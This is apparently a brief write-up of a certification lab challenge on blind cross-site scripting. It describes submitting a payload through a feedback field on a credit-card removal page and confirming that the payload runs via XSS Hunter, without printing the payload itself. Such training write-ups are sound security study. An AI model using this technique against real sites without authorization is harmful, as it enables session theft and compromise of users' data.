Challenge 3:Case Of Client Side Code (Part 2)
This is a detailed writeup created for challenges associated with the Certified Web AppSecurity Expert (CWAE) certification.
Challenge 3:Case Of Client Side Code (Part 2)
Challenge/Task
- Blind Cross-Site Scripting (XSS)
1. Third XSS - Blind Cross-Site Scripting (XSS)
Proof-of-Concept (POC):
Blind XSS is an attack that we cannot see the payload executed. Referring to the page below, there is a feedback field that we need to send when we want to remove the credit card.
We want to prove the XSS using XSS hunter. We want to know if the payload is executed. 
We send the payload and click okey. By default, our payload will be sent to the server. 
To see if our payload is successful or not, go to xss payload fires. The XSS is executed and appear in the console.
This post is licensed under CC BY 4.0 by the author.